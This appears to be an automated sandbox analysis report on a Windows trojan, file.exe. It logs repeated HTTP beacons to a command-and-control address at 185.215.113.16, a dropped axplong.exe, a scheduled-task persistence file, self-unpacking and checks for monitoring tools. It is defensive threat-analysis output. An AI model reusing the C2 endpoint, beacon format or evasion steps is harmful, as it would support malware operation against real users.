                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                  Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0073BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,5_2_0073BD60
                  Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.00000000012DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php0
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD
                  Source: axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD#
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpK
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpL
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpZ
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded3
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedG
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpf
                  Source: axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpg#
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=
                  Source: axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/X(6I

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_007730685_2_00773068
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00734CF05_2_00734CF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00767D835_2_00767D83
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0077765B5_2_0077765B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00734AF05_2_00734AF0
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0077777B5_2_0077777B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_007787205_2_00778720
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00776F095_2_00776F09
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_00772BD05_2_00772BD0
                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9974987227520435
                  Source: axplong.exe.0.drStatic PE information: Section: sfekpzlc ZLIB complexity 0.9946287643490265
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: file.exeReversingLabs: Detection: 52%
                  Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: file.exeStatic file information: File size 1965056 > 1048576

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 1.2.axplong.exe.730000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 5.2.axplong.exe.730000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sfekpzlc:EW;vvjbpxjb:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: axplong.exe.0.drStatic PE information: real checksum: 0x1ea687 should be: 0x1e4778
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                  Source: axplong.exe.0.drStatic PE information: section name:
                  Source: axplong.exe.0.drStatic PE information: section name: sfekpzlc
                  Source: axplong.exe.0.drStatic PE information: section name: vvjbpxjb
                  Source: axplong.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04EA026E push 0000005Bh; retn 0008h0_2_04EA027E
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0074D84C push ecx; ret 5_2_0074D85F
                  Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.986767743552173
                  Source: axplong.exe.0.drStatic PE information: section name: sfekpzlc entropy: 7.954399109377041
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
